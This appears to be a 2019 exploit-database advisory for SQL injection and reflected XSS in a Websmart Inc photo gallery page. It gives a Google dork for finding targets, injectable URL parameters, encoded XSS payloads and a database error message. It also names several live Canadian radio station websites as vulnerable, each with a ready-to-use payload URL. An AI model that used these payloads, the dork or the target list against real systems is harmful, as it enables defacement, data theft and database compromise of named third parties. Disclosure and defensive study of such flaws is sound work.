Websmart Inc Moose Jaw Area Canada XSS SQL Injection

2019.06.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################### # Exploit Title : Websmart Inc Moose Jaw Area Canada XSS SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 14/06/2019 # Vendor Homepage : websmart.ca # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:Web Site by Websmart Inc site:ca # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ################################################################### # Impact : *********** WebSmart Canada is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser or with any SQL Injector Tool. Reflected XSS (or Non-Persistent) : *************************************** The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. ################################################################### # SQL Injection Exploit : ********************** /photogallery_image_all.php?pageNum_rsimage=[ID-NUMBER]&totalRows_rsimage=[ID-NUMBER]&ImageCategory=[SQL Injection] /photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage=94&ImageCategory=91&ImageID=[SQL Injection] # Cross Site Scripting XSS Exploit : ******************************** /photogallery_image_all.php?pageNum_rsimage=10& totalRows_rsimage=94&ImageCategory=91&ImageID=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-By- KingSkrupellos%3C/font%3E%3C/marquee%3E /photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage= 94&ImageCategory=1%27<marquee><font%20color=lime%20size=32> XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee> ################################################################### # Example Vulnerable Sites : ************************* [+] bayshorebroadcasting.ca/photogallery_image_all.php?pageNum_rsimage=10& totalRows_rsimage=94&ImageCategory=91&ImageID=1%27 [+] bayshorebroadcasting.ca/photogallery_image_all.php?pageNum_rsimage=10& totalRows_rsimage=94&ImageCategory=91&ImageID=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-Found-By- KingSkrupellos%3C/font%3E%3C/marquee%3E [+] mix1065.ca/photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage= 94&ImageCategory=91&ImageID=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E [+] country1049.ca/photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage= 94&ImageCategory=91&ImageID=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E [+] country93.ca/photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage= 94&ImageCategory=91&ImageID=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E [+] 98thebeach.ca/photogallery_image_all.php?pageNum_rsimage=10&totalRows_rsimage= 94&ImageCategory=91&ImageID=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EXSS-Vulnerability-Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E ################################################################### # Example SQL Database Error : **************************** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND Images.Display ='1' LIMIT 10, 1' at line 1 ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top